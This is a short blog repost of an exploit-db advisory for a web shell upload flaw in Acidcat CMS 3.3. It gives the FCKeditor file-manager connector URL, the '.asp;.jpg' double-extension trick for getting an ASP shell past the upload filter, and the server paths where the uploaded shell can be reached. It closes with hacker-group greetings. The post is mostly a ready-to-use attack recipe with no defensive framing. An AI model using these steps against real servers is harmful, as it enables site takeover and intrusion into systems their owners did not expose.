Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability

Posted: February 23, 2011 by Hacking & Relax in exploit

===[ Exploit ]===

[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp

[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)

===[ Upload To ]===

[»] http://server/read_write/file/%5BShell%5D

[»] http://server/public/File/%5BShell%5D

Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1

BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker

Site: http://www.exploit-db.com/exploits/15597/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s